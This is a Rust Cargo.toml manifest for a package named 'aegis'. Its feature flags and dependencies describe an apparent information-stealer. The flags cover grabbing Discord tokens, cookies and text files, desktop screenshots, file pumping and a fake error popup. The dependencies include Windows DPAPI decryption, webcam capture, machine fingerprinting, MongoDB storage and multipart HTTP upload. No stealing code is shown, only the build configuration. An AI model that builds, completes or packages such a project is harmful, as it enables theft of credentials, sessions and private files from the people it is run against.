[package]
name = "aegis"
version = "0.1.0"
edition = "2024"

[features]
grab_discord_token = []
grab_cookies = []
grab_txts = []
desktop_screenshot = []
pump_file = []
fake_error = []

[dependencies]
aes-gcm = "0.10.3"
base64 = "0.22.1"
dirs = "6.0.0"
gethostname = "1.1.0"
mac_address = "1.1.8"
mongodb = "3.6.0"
nokhwa = "0.10.10"
regex = "1.12.3"
reqwest = { version = "0.13.2", features = ["json", "multipart"] }
screenshots = "0.8.10"
serde = { version = "1.0.228", features = ["derive"] }
serde_json = "1.0.149"
sysinfo = "0.39.1"
tokio = "1.52.3"
windows = { version = "0.62.2", features = ["Win32_Security_Cryptography", "Win32_Foundation"] }
windows-dpapi = "0.2.0"
winres = "0.1.12"
win-msgbox = "0.2.2"
